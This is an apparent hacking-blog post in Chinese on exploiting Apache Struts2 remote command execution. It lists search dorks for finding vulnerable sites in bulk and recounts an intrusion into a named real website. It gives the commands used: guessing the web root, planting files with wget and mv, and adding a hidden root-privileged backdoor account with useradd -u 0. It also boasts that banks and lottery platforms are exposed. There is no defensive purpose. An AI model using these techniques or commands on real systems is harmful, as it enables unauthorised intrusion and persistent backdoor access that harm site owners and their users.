struts2漏洞利用總結

原文:http://www.hack1990.com/cat_2/1235.html

這東西一開始下到還不會利用
這篇文章寫的不錯但是關鍵字不咋好用比較少
然後就開始了批量拿了並且自己和朋友也想了一些關鍵字
Inurl:index.action
Inurl:商城.achtion (商城比較多)
Inurl:index.achtion 標題:apache struts2
Inurl:action?id=
沒有NB的關鍵字 只有愛想的腦袋
關鍵字不唯一可能你多想想就能想出更牛的關鍵字
就開始利用吧
 

Struts2這個漏洞很多大站都存在 比如這個香港電視臺的
不過這個執行命令卡 我就換個搞過的吧 那樣方便演示

 

一小站 http://www.laipin.com/
這個漏洞一般都是阿帕奇 linux的
所以我們直接讀阿帕奇的配置文件我們可以直接用find 命令


這樣就會出現 那我們隨便讀個看看

 

/home/httpd

讀了後發現這2都是錯誤的也就是都錯誤的
不過我們有強大的 find的命令
找這個找了一會   不過突然想到了 robots.txt

於是我

然後利用cat 一個一個去讀 不過運氣好
/usr/local/bakresin4/webapps/laipin/robots.txt
/usr/local/webapps/laipin/robots.txt
/usr/local/resin4/webapps/laipin/robots.txt
/usr/local/resin3/webapps/laipin/robots.txt
/usr/local/bak-resin4-bak/webapps/laipin/robots.txt
/var/laipin/robots.txt
/home/ftpfile/laipin/robots.txt
/home/ftpfile/lp/robots.txt
/home/httpd/laipin/robots.txt
/home/httpd/laipin2/robots.txt

第2個就是正確的  不過我全部讀完了 確定就一個和網站的文件是匹配的

既然找到了根目錄
就想 寫文件呀
我用了
Echo bingdao test > /usr/local/webapps/laipin/1.txt (不成功)
Vi /usr/local/webapps/laipin/1.txt   (不成功)
Touch /usr/local/webapps/laipin/1.txt   (成功 但無法寫入內容)
Mkdir /usr/local/webapps/laipin/123/  (成功 但無內容)
我後來仔細的想了想 也證實了 是由於cd命令執行不成功
但不明確是 不成功 還是無效果(好吧 沒什麼區別)
不過突然記起來了 wooyun一牛提交過某個遠程代碼執行漏洞
看了一下他的細節 發現是用的 wget 下載命令進行添加文件
 

下載成功後 發現不在根目錄 
於是 mv 移動到根目錄
 

成功 不過發現了一件蛋疼的事  不解析

useradd -u 0  -o  -g root  -G root -d /home/bingdao bingdao -p bingdao

用戶也能添加成功
目測工具的危害性,而且目前國內好多銀行網站及涉密的網站,彩票平臺都存在漏洞
這篇文章也就到這了
全文沒什麼亮點 只是一種利用記錄。。
這東西 有時運氣好 滲透時就能秒殺... 平常也可以練下linux命令什麼的還是不錯
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章